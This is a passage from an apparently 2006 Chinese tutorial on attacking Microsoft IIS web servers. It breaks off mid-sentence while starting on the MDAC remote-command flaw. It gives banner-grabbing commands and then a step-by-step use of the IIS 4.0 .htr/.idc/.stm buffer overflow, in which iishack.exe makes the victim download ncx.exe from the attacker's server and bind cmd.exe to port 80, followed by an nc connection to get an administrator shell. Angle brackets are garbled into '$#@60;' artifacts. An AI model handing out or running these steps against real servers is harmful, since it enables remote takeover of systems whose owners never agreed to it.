IIS傻瓜攻防大全
日期:2006-04-06 荐:
1、介绍 由于这些方法针对通过端口80来操作,所以具有一定的威胁性,因为作为WEB你这个口总要开的。如果你想一边抽烟一边查漏洞,OK,你下载一些CGI扫描器来帮助你检查,你可以尝试使用这两个: "whisker" by "rain forest puppy" (www.wiretrip.net/rfp). "cis" by "mnemonix" (www.cerberus-infosec.co.uk) 另外你如果要知道目标机器运行的是啥类型的服务程序,你可以使用下面的命令: telnet $#@60;victim$#@62; 80 GET HEAD / HTTP/1.0 就可以返回一些名字和WEB服务程序版本,如果有些服务器把WEB运行在 8080,81,8000,8001口,你就TELNET相应的口上。 如果你要知道运行了SSL的WEB服务程序,在WEB服务器和浏览器进行了 连接的的话,我们就可以使用工具"ssleay":s_client -connect $#@60;victim$#@62;:443 HEAD / HTTP /1.0 2、一些常用方法: IIS HACK www.eeye.com的人员发现了一个IIS4.0的缓冲溢出可以允许用户上载程序,如netcat到目标服务器,并把cmd.exe绑定到80口。这个缓冲溢 出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求 没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。 要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器, 当然你可以是虚拟服务器哦。 你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应 的目录下,然后使用iishack.exe来检查目标机器: c:\$#@62;iishack.exe $#@60;victim$#@62; 80 $#@60;your web server$#@62;/ncx.exe 然后你就使用netcat来连接你要检测的服务器: c:\$#@62;nc $#@60;victim$#@62; 80 如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。 MDAC- 本地命令执行 你可能认为这个漏洞太老了,可网络如此之大,可能还有好多IIS WEB服务 器存在这个漏洞啦。IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到I
标签: